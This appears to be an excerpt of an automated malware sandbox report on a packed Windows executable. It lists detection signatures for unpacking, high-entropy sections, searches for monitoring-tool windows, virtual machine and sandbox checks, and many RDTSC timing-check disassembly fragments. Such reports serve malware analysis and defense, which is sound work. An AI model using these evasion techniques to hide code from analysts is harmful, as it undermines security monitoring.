                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: MaZjv5XeQi.exeStatic file information: File size 1847808 > 1048576
                Source: MaZjv5XeQi.exeStatic PE information: Raw size of buspngqz is bigger than: 0x100000 < 0x199200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeUnpacked PE file: 0.2.MaZjv5XeQi.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;buspngqz:EW;rkbtqtfk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;buspngqz:EW;rkbtqtfk:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: MaZjv5XeQi.exeStatic PE information: real checksum: 0x1d021c should be: 0x1d1ea5
                Source: MaZjv5XeQi.exeStatic PE information: section name:
                Source: MaZjv5XeQi.exeStatic PE information: section name: .idata
                Source: MaZjv5XeQi.exeStatic PE information: section name:
                Source: MaZjv5XeQi.exeStatic PE information: section name: buspngqz
                Source: MaZjv5XeQi.exeStatic PE information: section name: rkbtqtfk
                Source: MaZjv5XeQi.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_0100263B pushad ; ret 0_3_0100263D
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005276 push ecx; iretd 0_3_010052AA
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_3_01005CA4 push eax; iretd 0_3_01005CD1
                Source: MaZjv5XeQi.exeStatic PE information: section name: entropy: 7.977266846622565
                Source: MaZjv5XeQi.exeStatic PE information: section name: buspngqz entropy: 7.953319540828306

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E0E7 second address: B6E0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E36C second address: B6E372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E372 second address: B6E382 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E382 second address: B6E388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E388 second address: B6E38C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E646 second address: B6E663 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEB1CC19F7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEB1CC19F7Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E663 second address: B6E66D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B6E7A0 second address: B6E7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B70FEF second address: B71089 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEB1C7EA9EDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 05984120h 0x00000011 mov dword ptr [ebp+122D2DEFh], ecx 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FEB1C7EA9D8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 jnl 00007FEB1C7EA9DAh 0x0000003c pop edi 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007FEB1C7EA9D8h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D30DFh], edi 0x0000005f jnl 00007FEB1C7EA9D7h 0x00000065 push DCF89795h 0x0000006a pushad 0x0000006b pushad 0x0000006c ja 00007FEB1C7EA9D6h 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B71224 second address: B71228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B71228 second address: B71236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B71236 second address: B7123C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B7123C second address: B712BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FEB1C7EA9D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2BFBh], ebx 0x0000002a mov esi, dword ptr [ebp+122D363Ch] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FEB1C7EA9D8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov ecx, 653FFDE1h 0x00000051 push F249E4FCh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FEB1C7EA9E0h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B712BE second address: B712C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B712C3 second address: B71355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 0DB61B84h 0x0000000e mov dword ptr [ebp+122D3004h], edi 0x00000014 push 00000003h 0x00000016 push ebx 0x00000017 pop ecx 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b jno 00007FEB1C7EA9DCh 0x00000021 pop esi 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FEB1C7EA9D8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e push BA5BAF72h 0x00000043 jmp 00007FEB1C7EA9E9h 0x00000048 add dword ptr [esp], 05A4508Eh 0x0000004f mov dword ptr [ebp+122D32E6h], edi 0x00000055 mov esi, ebx 0x00000057 lea ebx, dword ptr [ebp+1244BEC0h] 0x0000005d movzx edx, si 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007FEB1C7EA9DCh 0x00000069 jnp 00007FEB1C7EA9D6h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B906B9 second address: B906D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1CC19F80h 0x00000009 jl 00007FEB1CC19F76h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B906D4 second address: B9071D instructions: 0x00000000 rdtsc 0x00000002 js 00007FEB1C7EA9F4h 0x00000008 jmp 00007FEB1C7EA9DEh 0x0000000d jmp 00007FEB1C7EA9E0h 0x00000012 jmp 00007FEB1C7EA9E5h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jo 00007FEB1C7EA9D6h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9071D second address: B90747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1CC19F86h 0x0000000a pushad 0x0000000b jp 00007FEB1CC19F76h 0x00000011 jnc 00007FEB1CC19F76h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B90C90 second address: B90C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B90C98 second address: B90CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FEB1CC19F78h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B90CA5 second address: B90CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B90CAB second address: B90CC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F81h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B88584 second address: B88588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B88588 second address: B885AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FEB1CC19F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FEB1CC19F85h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B915CF second address: B915D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91B87 second address: B91B8D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91B8D second address: B91B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FEB1C7EA9D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91B9C second address: B91BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FEB1CC19F81h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91BB9 second address: B91BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FEB1C7EA9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91BC3 second address: B91BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B91D06 second address: B91D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEB1C7EA9DAh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEB1C7EA9E3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B94537 second address: B9453D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9453D second address: B94541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B95FB9 second address: B95FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B95FBF second address: B95FFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jbe 00007FEB1C7EA9E0h 0x00000016 jmp 00007FEB1C7EA9DAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FEB1C7EA9DBh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9937F second address: B99384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B5EC03 second address: B5EC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9C7E4 second address: B9C809 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEB1CC19F85h 0x00000008 push edx 0x00000009 jmp 00007FEB1CC19F7Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9C947 second address: B9C959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jbe 00007FEB1C7EA9D6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9C959 second address: B9C967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jno 00007FEB1CC19F76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9C967 second address: B9C97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEB1C7EA9DEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9C97C second address: B9C980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9CD3D second address: B9CD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9CEA1 second address: B9CEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9CEA7 second address: B9CEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9CEAC second address: B9CEB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9ECC5 second address: B9ECD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B9F3CF second address: B9F3D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA0598 second address: BA059C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA046E second address: BA0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA059C second address: BA0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FEB1C7EA9E9h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FEB1C7EA9D8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D208Bh], eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FEB1C7EA9D8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b push 00000000h 0x0000004d jmp 00007FEB1C7EA9E6h 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007FEB1C7EA9D6h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA0623 second address: BA062D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA062D second address: BA0631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA0DB0 second address: BA0DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA2131 second address: BA2144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1C7EA9DFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA0DB6 second address: BA0DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA2144 second address: BA2148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA2148 second address: BA2156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
